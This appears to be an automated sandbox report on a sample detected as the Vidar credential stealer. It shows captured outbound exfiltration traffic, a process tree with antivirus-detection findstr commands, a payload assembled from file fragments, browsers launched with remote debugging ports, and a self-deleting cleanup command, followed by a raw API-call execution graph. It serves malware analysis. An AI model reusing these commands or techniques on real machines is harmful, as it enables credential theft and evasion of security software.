Timestamp: 2024-12-23 05:24:54 UTC
Bytes transferred: 331
Direction: OUT
Data Raw: 2d 2d 2d 2d 2d 2d 37 59 43 42 49 45 33 37 59 43 42 41 49 45 43 32 36 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 37 59 43 42 49 45 33 37 59 43 42 41 49 45 43 32 36 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 37 59 43 42 49 45 33 37 59 43 42 41 49 45 43 32 36 46 43 42 0d 0a 43 6f 6e 74
Data Ascii: ------7YCBIE37YCBAIEC26FCBContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------7YCBIE37YCBAIEC26FCBContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------7YCBIE37YCBAIEC26FCBCont

Timestamp: 2024-12-23 05:24:55 UTC
Bytes transferred: 158
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:24:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

Timestamp: 2024-12-23 05:24:55 UTC
Bytes transferred: 5
Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                                                                  Start time:00:23:07
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\trZG6pItZj.exe"
                                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                                  File size:1'146'198 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:1B31C291993985499CF544CC549E9028
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                                                                  Start time:00:23:08
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c move Earning Earning.cmd & Earning.cmd
                                                                                                                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                                                                  Start time:00:23:08
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                                                                                  Start time:00:23:10
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:tasklist
                                                                                                                                                                                                                                                                                                  Imagebase:0xeb0000
                                                                                                                                                                                                                                                                                                  File size:79'360 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                                                                                  Start time:00:23:10
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                                                                  Imagebase:0x50000
                                                                                                                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                                                                                  Start time:00:23:10
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:tasklist
                                                                                                                                                                                                                                                                                                  Imagebase:0xeb0000
                                                                                                                                                                                                                                                                                                  File size:79'360 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                                                                  Start time:00:23:10
                                                                                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                                                                  Imagebase:0x50000
                                                                                                                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                  Has exited:true

Target ID: 8
Start time: 00:23:11
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c md 139308
Imagebase: 0x790000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 00:23:11
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr /V "Frame" Ron
Imagebase: 0x50000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 00:23:11
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c copy /b ..\Brochure + ..\Divine + ..\Surgery + ..\Posting j
Imagebase: 0x790000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 00:23:11
Start date: 23/12/2024
Path: C:\Users\user\AppData\Local\Temp\139308\Procedures.com
Wow64 process (32bit): true
Commandline: Procedures.com j
Imagebase: 0xe20000
File size: 947'288 bytes
MD5 hash: 62D09F076E6E0240548C2F837536A46A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2364490676.0000000003FB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2364595712.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2364186643.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3157816062.0000000003FB1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2364080745.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3156069871.0000000003CB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2364772112.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.3152315599.000000000141D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3152315599.000000000141D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation: moderate
Has exited: true

Target ID: 12
Start time: 00:23:11
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit): true
Commandline: choice /d y /t 5
Imagebase: 0x800000
File size: 28'160 bytes
MD5 hash: FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 15
Start time: 00:23:53
Start date: 23/12/2024
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase: 0x7ff715980000
File size: 3'242'272 bytes
MD5 hash: 45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID:17
Start time:00:23:54
Start date:23/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2508 --field-trial-handle=2356,i,7400359050630250975,17873444057706261600,262144 /prefetch:8
Imagebase:0x7ff715980000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:00:24:07
Start date:23/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:00:24:08
Start date:23/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2592 --field-trial-handle=2492,i,16554835861634890053,15790992392374855556,262144 /prefetch:3
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:00:24:08
Start date:23/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:00:24:08
Start date:23/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=2052,i,14059903290940015210,10677024805754499588,262144 /prefetch:3
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:00:24:18
Start date:23/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:00:24:19
Start date:23/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:25
Start time:00:24:19
Start date:23/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2724 --field-trial-handle=2372,i,14569064523681728109,8577273085743409208,262144 /prefetch:3
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:00:24:20
Start date:23/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2744 --field-trial-handle=2032,i,6507242077196417837,14761071536030343360,262144 /prefetch:3
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:32
Start time:00:24:26
Start date:23/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6748 --field-trial-handle=2032,i,6507242077196417837,14761071536030343360,262144 /prefetch:8
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:33
Start time:00:24:26
Start date:23/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6900 --field-trial-handle=2032,i,6507242077196417837,14761071536030343360,262144 /prefetch:8
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:00:24:55
Start date:23/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\139308\Procedures.com" & rd /s /q "C:\ProgramData\DJMYU3ECBA1N" & exit
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:36
Start time:00:24:55
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:37
Start time:00:24:55
Start date:23/12/2024
Path:C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):true
Commandline:timeout /t 10
Imagebase:0xb70000
File size:25'088 bytes
MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true


Execution Graph

Execution Coverage:17.5%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:21%
Total number of Nodes:1482
Total number of Limit Nodes:25
4287->4347 4351 405cb0 GetDlgItemTextW 4287->4351 4288->4287 4296 406831 18 API calls 4288->4296 4288->4347 4289 404516 4290 406064 5 API calls 4289->4290 4292 40451c 4290->4292 4294 40457d ShowWindow 4291->4294 4295 403ea0 5 API calls 4292->4295 4294->4299 4300 404521 GetDlgItem 4295->4300 4301 40465b SHBrowseForFolderW 4296->4301 4297 4046f5 4302 4067aa 18 API calls 4297->4302 4298 403df6 8 API calls 4303 404873 4298->4303 4304 4045a5 SetWindowTextW 4299->4304 4308 405d85 4 API calls 4299->4308 4305 40452f IsDlgButtonChecked 4300->4305 4300->4347 4301->4287 4307 404673 CoTaskMemFree 4301->4307 4312 4046fb 4302->4312 4306 403d6b 19 API calls 4304->4306 4305->4283 4310 4045c3 4306->4310 4311 40674e 3 API calls 4307->4311 4309 40459b 4308->4309 4309->4304 4316 40674e 3 API calls 4309->4316 4313 403d6b 19 API calls 4310->4313 4314 404680 4311->4314 4352 406035 lstrcpynW 4312->4352 4317 4045ce 4313->4317 4318 4046b7 SetDlgItemTextW 4314->4318 4323 406831 18 API calls 4314->4323 4316->4304 4350 403dc4 SendMessageW 4317->4350 4318->4287 4319 404712 4321 406328 3 API calls 4319->4321 4330 40471a 4321->4330 4322 4045d6 4324 406328 3 API calls 4322->4324 4325 40469f lstrcmpiW 4323->4325 4324->4288 4325->4318 4328 4046b0 lstrcatW 4325->4328 4326 40475c 4353 406035 lstrcpynW 4326->4353 4328->4318 4329 404765 4331 405d85 4 API calls 4329->4331 4330->4326 4334 40677d 2 API calls 4330->4334 4336 4047b1 4330->4336 4332 40476b GetDiskFreeSpaceW 4331->4332 4335 40478f MulDiv 4332->4335 4332->4336 4334->4330 4335->4336 4337 40480e 4336->4337 4354 4043d9 4336->4354 4338 404831 4337->4338 4340 40141d 80 API calls 4337->4340 4362 403db1 KiUserCallbackDispatcher 4338->4362 4340->4338 4341 4047ff 4343 404810 SetDlgItemTextW 4341->4343 4344 404804 4341->4344 4343->4337 4346 4043d9 21 API calls 4344->4346 4345 40484d 4345->4347 4363 403d8d 4345->4363 4346->4337 4347->4298 4349->4289 4350->4322 4351->4297 4352->4319 4353->4329 4355 4043f9 4354->4355 4356 406831 18 API calls 4355->4356 4357 
404439 4356->4357 4358 406831 18 API calls 4357->4358 4359 404444 4358->4359 4360 406831 18 API calls 4359->4360 4361 404454 lstrlenW wsprintfW SetDlgItemTextW 4360->4361 4361->4341 4362->4345 4364 403da0 SendMessageW 4363->4364 4365 403d9b 4363->4365 4364->4347 4365->4364 4366 401dd3 4367 401446 18 API calls 4366->4367 4368 401dda 4367->4368 4369 401446 18 API calls 4368->4369 4370 4018d3 4369->4370 4371 402e55 4372 40145c 18 API calls 4371->4372 4373 402e63 4372->4373 4374 402e79 4373->4374 4375 40145c 18 API calls 4373->4375 4376 405e5c 2 API calls 4374->4376 4375->4374 4377 402e7f 4376->4377 4401 405e7c GetFileAttributesW CreateFileW 4377->4401 4379 402e8c 4380 402f35 4379->4380 4381 402e98 GlobalAlloc 4379->4381 4384 4062cf 11 API calls 4380->4384 4382 402eb1 4381->4382 4383 402f2c CloseHandle 4381->4383 4402 403368 SetFilePointer 4382->4402 4383->4380 4386 402f45 4384->4386 4388 402f50 DeleteFileW 4386->4388 4389 402f63 4386->4389 4387 402eb7 4390 403336 ReadFile 4387->4390 4388->4389 4403 401435 4389->4403 4392 402ec0 GlobalAlloc 4390->4392 4393 402ed0 4392->4393 4394 402f04 WriteFile GlobalFree 4392->4394 4396 40337f 33 API calls 4393->4396 4395 40337f 33 API calls 4394->4395 4397 402f29 4395->4397 4400 402edd 4396->4400 4397->4383 4399 402efb GlobalFree 4399->4394 4400->4399 4401->4379 4402->4387 4404 404f9e 25 API calls 4403->4404 4405 401443 4404->4405 4406 401cd5 4407 401446 18 API calls 4406->4407 4408 401cdd 4407->4408 4409 401446 18 API calls 4408->4409 4410 401ce8 4409->4410 4411 40145c 18 API calls 4410->4411 4412 401cf1 4411->4412 4413 401d07 lstrlenW 4412->4413 4414 401d43 4412->4414 4415 401d11 4413->4415 4415->4414 4419 406035 lstrcpynW 4415->4419 4417 401d2c 4417->4414 4418 401d39 lstrlenW 4417->4418 4418->4414 4419->4417 4420 402cd7 4421 401446 18 API calls 4420->4421 4423 402c64 4421->4423 4422 402d17 ReadFile 4422->4423 4423->4420 4423->4422 4424 402d99 4423->4424 4425 402dd8 4426 4030e3 4425->4426 4427 402ddf 4425->4427 4428 402de5 
FindClose 4427->4428 4428->4426 4429 401d5c 4430 40145c 18 API calls 4429->4430 4431 401d63 4430->4431 4432 40145c 18 API calls 4431->4432 4433 401d6c 4432->4433 4434 401d73 lstrcmpiW 4433->4434 4435 401d86 lstrcmpW 4433->4435 4436 401d79 4434->4436 4435->4436 4437 401c99 4435->4437 4436->4435 4436->4437 4438 4027e3 4439 4027e9 4438->4439 4440 4027f2 4439->4440 4441 402836 4439->4441 4454 401553 4440->4454 4442 40145c 18 API calls 4441->4442 4444 40283d 4442->4444 4446 4062cf 11 API calls 4444->4446 4445 4027f9 4447 40145c 18 API calls 4445->4447 4451 401a13 4445->4451 4448 40284d 4446->4448 4449 40280a RegDeleteValueW 4447->4449 4458 40149d RegOpenKeyExW 4448->4458 4450 4062cf 11 API calls 4449->4450 4453 40282a RegCloseKey 4450->4453 4453->4451 4455 401563 4454->4455 4456 40145c 18 API calls 4455->4456 4457 401589 RegOpenKeyExW 4456->4457 4457->4445 4461 4014c9 4458->4461 4466 401515 4458->4466 4459 4014ef RegEnumKeyW 4460 401501 RegCloseKey 4459->4460 4459->4461 4463 406328 3 API calls 4460->4463 4461->4459 4461->4460 4462 401526 RegCloseKey 4461->4462 4464 40149d 3 API calls 4461->4464 4462->4466 4465 401511 4463->4465 4464->4461 4465->4466 4467 401541 RegDeleteKeyW 4465->4467 4466->4451 4467->4466 4468 4040e4 4469 4040ff 4468->4469 4475 40422d 4468->4475 4471 40413a 4469->4471 4499 403ff6 WideCharToMultiByte 4469->4499 4470 404298 4472 40436a 4470->4472 4473 4042a2 GetDlgItem 4470->4473 4479 403d6b 19 API calls 4471->4479 4480 403df6 8 API calls 4472->4480 4476 40432b 4473->4476 4477 4042bc 4473->4477 4475->4470 4475->4472 4478 404267 GetDlgItem SendMessageW 4475->4478 4476->4472 4481 40433d 4476->4481 4477->4476 4485 4042e2 6 API calls 4477->4485 4504 403db1 KiUserCallbackDispatcher 4478->4504 4483 40417a 4479->4483 4484 404365 4480->4484 4486 404353 4481->4486 4487 404343 SendMessageW 4481->4487 4489 403d6b 19 API calls 4483->4489 4485->4476 4486->4484 4490 404359 SendMessageW 4486->4490 4487->4486 4488 404293 4491 403d8d SendMessageW 4488->4491 4492 404187 
CheckDlgButton 4489->4492 4490->4484 4491->4470 4502 403db1 KiUserCallbackDispatcher 4492->4502 4494 4041a5 GetDlgItem 4503 403dc4 SendMessageW 4494->4503 4496 4041bb SendMessageW 4497 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4496->4497 4498 4041d8 GetSysColor 4496->4498 4497->4484 4498->4497 4500 404033 4499->4500 4501 404015 GlobalAlloc WideCharToMultiByte 4499->4501 4500->4471 4501->4500 4502->4494 4503->4496 4504->4488 4505 402ae4 4506 402aeb 4505->4506 4507 4030e3 4505->4507 4508 402af2 CloseHandle 4506->4508 4508->4507 4509 402065 4510 401446 18 API calls 4509->4510 4511 40206d 4510->4511 4512 401446 18 API calls 4511->4512 4513 402076 GetDlgItem 4512->4513 4514 4030dc 4513->4514 4515 4030e3 4514->4515 4517 405f7d wsprintfW 4514->4517 4517->4515 4518 402665 4519 40145c 18 API calls 4518->4519 4520 40266b 4519->4520 4521 40145c 18 API calls 4520->4521 4522 402674 4521->4522 4523 40145c 18 API calls 4522->4523 4524 40267d 4523->4524 4525 4062cf 11 API calls 4524->4525 4526 40268c 4525->4526 4527 406301 2 API calls 4526->4527 4528 402695 4527->4528 4529 4026a6 lstrlenW lstrlenW 4528->4529 4531 404f9e 25 API calls 4528->4531 4533 4030e3 4528->4533 4530 404f9e 25 API calls 4529->4530 4532 4026e8 SHFileOperationW 4530->4532 4531->4528 4532->4528 4532->4533 4534 401c69 4535 40145c 18 API calls 4534->4535 4536 401c70 4535->4536 4537 4062cf 11 API calls 4536->4537 4538 401c80 4537->4538 4539 405ccc MessageBoxIndirectW 4538->4539 4540 401a13 4539->4540 4541 402f6e 4542 402f72 4541->4542 4543 402fae 4541->4543 4545 4062cf 11 API calls 4542->4545 4544 40145c 18 API calls 4543->4544 4551 402f9d 4544->4551 4546 402f7d 4545->4546 4547 4062cf 11 API calls 4546->4547 4548 402f90 4547->4548 4549 402fa2 4548->4549 4550 402f98 4548->4550 4553 406113 9 API calls 4549->4553 4552 403ea0 5 API calls 4550->4552 4552->4551 4553->4551 4554 4023f0 4555 402403 4554->4555 4556 4024da 4554->4556 4557 40145c 18 API calls 4555->4557 4558 404f9e 25 API calls 
